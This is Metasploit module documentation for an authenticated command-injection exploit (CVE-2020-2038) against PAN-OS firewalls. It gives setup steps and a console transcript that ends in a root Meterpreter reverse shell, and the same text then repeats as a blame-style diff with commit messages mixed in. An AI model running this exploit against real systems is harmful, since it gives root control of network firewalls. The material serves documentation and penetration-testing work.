documentation/modules/exploit/linux/http/panos_op_cmd_exec.md

## Vulnerable Application

This module exploits CVE-2020-2038, an authenticated OS Command Injection vulnerability in PAN-OS versions < 10.0.1,
< 9.1.4 and <9.0.10 that allows authenticated administrators to execute arbitrary OS commands with root privileges. The
Rest API allows authenticated users to send operational mode commands via the "op" request. Insufficient filtering of
user inputs in the "op" request allows an attacker to inject commands.

A Palo Alto Firewall demo VM can be requested at the following
[link](https://www.paloaltonetworks.com/company/request-demo). PAN‑OS is the software that runs all Palo Alto Networks
next-generation firewalls. PAN-OS will be running on the VM by default. The only setup necessary should be setting the
administrator password.

## Verification Steps

1. Start msfconsole
1. Do: `use exploit/linux/http/panos_auth_rce`
1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
1. Run the module
1. Receive a Meterpreter session as the `root` user.

## Scenarios
### PAN-OS 10.0.0
```
msf > use linux/http/panos_auth_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf exploit(linux/http/panos_auth_rce) > set rhosts 192.168.2.196
rhosts => 192.168.2.196
msf exploit(linux/http/panos_auth_rce) > set USERNAME admin
USERNAME => admin
msf exploit(linux/http/panos_auth_rce) > set PASSWORD N0tpassword!
PASSWORD => N0tpassword!
msf exploit(linux/http/panos_auth_rce) > run

[*] Started reverse TCP handler on 192.168.2.114:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Authenticating...
[+] Successfully obtained api key
[+] The target is vulnerable.
[*] Exploiting...
[*] Sending stage (989032 bytes) to 192.168.2.196
[*] Meterpreter session 1 opened (192.168.2.114:4444 -> 192.168.2.196:52592) at 2022-08-17 16:13:19 -0400
[*] Command Stager progress - 100.00% done (1111/1111 bytes)

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : PA-VM-10-0-0.home
OS           : Red Hat  (Linux 3.10.0-957.21.3.10.pan.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```
-											Add PAN-OS auth command injection module
										
										
											2022-08-16 09:44:05 -04:00
+								## Vulnerable Application
-											Updated error handling
										
										
											2022-09-13 12:40:59 -04:00
+								This module exploits CVE-2020-2038, an authenticated OS Command Injection vulnerability in PAN-OS versions < 10.0.1,
 								< 9.1.4 and <9.0.10 that allows authenticated administrators to execute arbitrary OS commands with root privileges. The
 								Rest API allows authenticated users to send operational mode commands via the "op" request. Insufficient filtering of
 								user inputs in the "op" request allows an attacker to inject commands.
-											Added check method, reponded to PR comments
										
										
											2022-08-17 17:24:03 -04:00
-											Updated error handling
										
										
											2022-09-13 12:40:59 -04:00
+								A Palo Alto Firewall demo VM can be requested at the following
 								[link](https://www.paloaltonetworks.com/company/request-demo). PAN‑OS is the software that runs all Palo Alto Networks
 								next-generation firewalls. PAN-OS will be running on the VM by default. The only setup necessary should be setting the
 								administrator password.
-											Add PAN-OS auth command injection module
										
										
											2022-08-16 09:44:05 -04:00
 								## Verification Steps
 . Start msfconsole
 . Do: `use exploit/linux/http/panos_auth_rce`
 . Set the `RHOST`, `USERNAME`, and `PASSWORD` options
-											Updated error handling
										
										
											2022-09-13 12:40:59 -04:00
+. Run the module
-											Update documentation/modules/exploit/linux/http/panos_auth_rce.md
										
										
											2022-08-17 13:32:36 -04:00
+. Receive a Meterpreter session as the `root` user.
-											Add PAN-OS auth command injection module
										
										
											2022-08-16 09:44:05 -04:00
-											Updated error handling
										
										
											2022-09-13 12:40:59 -04:00
+								## Scenarios
 								### PAN-OS 10.0.0
-											Add PAN-OS auth command injection module
										
										
											2022-08-16 09:44:05 -04:00
+								```
-											Updates docs to reflect new default prompt
										
										
											2025-07-17 09:53:40 +01:00
+								msf > use linux/http/panos_auth_rce
-											Add PAN-OS auth command injection module
										
										
											2022-08-16 09:44:05 -04:00
+								[*] Using configured payload linux/x64/meterpreter/reverse_tcp
-											Updates docs to reflect new default prompt
										
										
											2025-07-17 09:53:40 +01:00
+								msf exploit(linux/http/panos_auth_rce) > set rhosts 192.168.2.196
-											Add PAN-OS auth command injection module
										
										
											2022-08-16 09:44:05 -04:00
+								rhosts => 192.168.2.196
-											Updates docs to reflect new default prompt
										
										
											2025-07-17 09:53:40 +01:00
+								msf exploit(linux/http/panos_auth_rce) > set USERNAME admin
-											Add PAN-OS auth command injection module
										
										
											2022-08-16 09:44:05 -04:00
+								USERNAME => admin
-											Updates docs to reflect new default prompt
										
										
											2025-07-17 09:53:40 +01:00
+								msf exploit(linux/http/panos_auth_rce) > set PASSWORD N0tpassword!
-											Add PAN-OS auth command injection module
										
										
											2022-08-16 09:44:05 -04:00
+								PASSWORD => N0tpassword!
-											Updates docs to reflect new default prompt
										
										
											2025-07-17 09:53:40 +01:00
+								msf exploit(linux/http/panos_auth_rce) > run
-											Add PAN-OS auth command injection module
										
										
											2022-08-16 09:44:05 -04:00
 								[*] Started reverse TCP handler on 192.168.2.114:4444
-											Added check method, reponded to PR comments
										
										
											2022-08-17 17:24:03 -04:00
+								[*] Running automatic check ("set AutoCheck false" to disable)
-											Add PAN-OS auth command injection module
										
										
											2022-08-16 09:44:05 -04:00
+								[*] Authenticating...
 								[+] Successfully obtained api key
-											Added check method, reponded to PR comments
										
										
											2022-08-17 17:24:03 -04:00
+								[+] The target is vulnerable.
-											Add PAN-OS auth command injection module
										
										
											2022-08-16 09:44:05 -04:00
+								[*] Exploiting...
-											Added check method, reponded to PR comments
										
										
											2022-08-17 17:24:03 -04:00
+								[*] Sending stage (989032 bytes) to 192.168.2.196
 								[*] Meterpreter session 1 opened (192.168.2.114:4444 -> 192.168.2.196:52592) at 2022-08-17 16:13:19 -0400
 								[*] Command Stager progress - 100.00% done (1111/1111 bytes)
-											Add PAN-OS auth command injection module
										
										
											2022-08-16 09:44:05 -04:00
+								meterpreter > getuid
 								Server username: root
 								meterpreter > sysinfo
 								Computer     : PA-VM-10-0-0.home
 								OS           : Red Hat  (Linux 3.10.0-957.21.3.10.pan.x86_64)
 								Architecture : x64
 								BuildTuple   : x86_64-linux-musl
 								Meterpreter  : x64/linux
 								meterpreter >
 								```